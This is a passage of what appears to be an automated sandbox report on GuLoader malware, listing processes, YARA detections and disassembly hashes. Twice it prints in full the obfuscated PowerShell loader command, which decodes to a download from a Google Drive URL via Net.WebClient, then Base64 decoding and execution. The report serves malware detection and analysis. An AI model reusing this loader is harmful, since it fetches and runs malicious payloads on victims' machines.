                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
                                              Imagebase:0x7ff788560000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:2
                                              Start time:13:43:17
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff7699e0000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:6
                                              Start time:13:43:35
                                              Start date:25/10/2024
                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;"
                                              Imagebase:0x700000
                                              File size:433'152 bytes
                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2132213145.0000000008610000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2113399982.0000000005665000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2132748645.0000000008DD5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:7
                                              Start time:13:43:35
                                              Start date:25/10/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff70f330000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:8
                                              Start time:13:43:53
                                              Start date:25/10/2024
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                              Imagebase:0x100000
                                              File size:59'904 bytes
                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:13:44:12
                                              Start date:25/10/2024
                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292
                                              Imagebase:0xfb0000
                                              File size:483'680 bytes
                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                              Has elevated privileges:false
                                              Has administrator privileges:false
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Executed Functions

                                                Function 00007FFD9B8AC866 Relevance: 3.0, Strings: 2, Instructions: 476COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [As$[As
                                                • API String ID: 0-762177033
                                                • Opcode ID: 4bc387c5c2a3361b21a0d641b38030023cdc73e167c80cfbba9f8524bd163d99
                                                • Instruction ID: a3bd0d97ca28a3d7b10984e6fd7058b5855abda58fdc523aa70247feff64b716
                                                • Opcode Fuzzy Hash: 4bc387c5c2a3361b21a0d641b38030023cdc73e167c80cfbba9f8524bd163d99
                                                • Instruction Fuzzy Hash: 7AF1A630609A4D8FEBA8DF28CC557E977D1FF58310F04426EE85DC7295DB34A9458B82
                                                Function 00007FFD9B8AD612 Relevance: 3.0, Strings: 2, Instructions: 462COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [As$[As
                                                • API String ID: 0-762177033
                                                • Opcode ID: 732e2b3fe60f66273896b96a8815bd539f4e969c92f6af2006a4b64de829864c
                                                • Instruction ID: 328a3ff6f2851b4acf4ade381f87061c5473867d4e772b0049f9abd9a8226dd0
                                                • Opcode Fuzzy Hash: 732e2b3fe60f66273896b96a8815bd539f4e969c92f6af2006a4b64de829864c
                                                • Instruction Fuzzy Hash: 3BE1C430A09A4D8FEBA8DF28C8657E977D1FF58310F04826ED85DC72A5DE74A9418B81
                                                Function 00007FFD9BB2141A Relevance: .5, Instructions: 547COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 372c27fab40303ce84764b0b92cccb793a6a50071e86eac5f1755e6a24e3a795
                                                • Instruction ID: a56440d1d89b5ec83202f1751f2e39e2dbcaca94f67ba5f2ac6dce3de34c8b8a
                                                • Opcode Fuzzy Hash: 372c27fab40303ce84764b0b92cccb793a6a50071e86eac5f1755e6a24e3a795
                                                • Instruction Fuzzy Hash: 2D021922A0F7C90FEB66976888655647BE1EF66214F0901FED0ADCB1E3DE18AD45C342
                                                Function 00007FFD9B8AD226 Relevance: 2.8, Strings: 2, Instructions: 335COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: [As$[As
                                                • API String ID: 0-762177033
                                                • Opcode ID: 1c381f81335c5746a872ed3d1de50b063e2e6fe3a253b62718513dbbb31b2548
                                                • Instruction ID: 2448039ce902cac28dacdcba042604a504244512f19108bfc81fd7834e9e684e
                                                • Opcode Fuzzy Hash: 1c381f81335c5746a872ed3d1de50b063e2e6fe3a253b62718513dbbb31b2548
                                                • Instruction Fuzzy Hash: CBB1E83060DA4D4FEB68DF28D8557E93BD1FF59310F04426EE84DC7296DA34A945CB82
                                                Function 00007FFD9B971F92 Relevance: 1.1, Instructions: 1093COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c2bd8f9c59d64dae337474785df1f91db42dd205b13fb5fc1352218579226f3e
                                                • Instruction ID: 47e89e22c317f4079b4d08aa8953daef9240f4b29b05c1961044793cd8d22566
                                                • Opcode Fuzzy Hash: c2bd8f9c59d64dae337474785df1f91db42dd205b13fb5fc1352218579226f3e
                                                • Instruction Fuzzy Hash: 29821731A2FA895FEBA5DBA884A49647BE1FF52304F1900FED05DCB1E3DA25AC45C700
                                                Function 00007FFD9B979CD9 Relevance: .7, Instructions: 704COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1954442618.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b970000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fc174bc84ae023e700efd9481ef8a8d7692f939918c1054b67b0a5044245c334
                                                • Instruction ID: 85dd6fcdab45111a925162cb2fa3a4b417242aa84705521ad41afefc50582c86
                                                • Opcode Fuzzy Hash: fc174bc84ae023e700efd9481ef8a8d7692f939918c1054b67b0a5044245c334
                                                • Instruction Fuzzy Hash: E2225722B1FA8D2FE766976C58A56B53BD1EF52210F0901FFE49DC70E3EA18AD058341
                                                Function 00007FFD9B8AEAF5 Relevance: .7, Instructions: 682COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1949735839.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9b8a0000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ada6fd7b052d4bb1b1430aa40d5ce6287cc3b75d791ba9576f592987d56d28c
                                                • Instruction ID: 80f3bc8635620bc07cc77ffa5a0bd96525be7df3a411d3bcc6203407c0af86fb
                                                • Opcode Fuzzy Hash: 3ada6fd7b052d4bb1b1430aa40d5ce6287cc3b75d791ba9576f592987d56d28c
                                                • Instruction Fuzzy Hash: FB328130A18A4D8FDF98DF9CC4A5AA97BE1FFA8301F25416ED009D7695CB35E841CB81
                                                Function 00007FFD9BB20C78 Relevance: .5, Instructions: 496COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1957587871.00007FFD9BB20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_7ffd9bb20000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
